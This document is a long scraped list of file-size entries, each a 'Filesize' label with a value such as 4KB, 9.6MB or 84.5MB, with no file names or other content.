3.5MB
-
Filesize
3.5MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
28KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
84.5MB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
1.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
412KB
-
Filesize
280KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
276KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
192KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
3.5MB
-
Filesize
7.0MB
-
Filesize
7.0MB
-
Filesize
17.8MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
80KB
-
Filesize
7.0MB
-
Filesize
7.0MB
-
Filesize
128KB
-
Filesize
7.0MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
288KB
-
Filesize
52KB
-
Filesize
3.5MB
-
Filesize
1.9MB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
20KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
644KB
-
Filesize
388KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
84.5MB
-
Filesize
84.5MB
-
Filesize
4KB
-
Filesize
232KB
-
Filesize
344KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
312KB
-
Filesize
312KB
-
Filesize
4KB
-
Filesize
412KB
-
Filesize
1.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
88KB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
1.2MB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
40KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
320KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
304KB
-
Filesize
92KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
140KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
728KB
-
Filesize
344KB
-
Filesize
232KB
-
Filesize
4KB
-
Filesize
608KB
-
Filesize
604KB
-
Filesize
4KB
-
Filesize
292KB
-
Filesize
292KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
4KB
-
Filesize
9.0MB
-
Filesize
7.0MB
-
Filesize
7.0MB
-
Filesize
288KB
-
Filesize
52KB
-
Filesize
672KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
676KB
-
Filesize
1.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
568KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
344KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
84.5MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
572KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
432KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
17.8MB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
28KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
300KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
240KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
28KB
-
Filesize
172KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
288KB
-
Filesize
52KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
248KB
-
Filesize
932KB
-
Filesize
4KB
-
Filesize
1.5MB
-
Filesize
17.8MB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB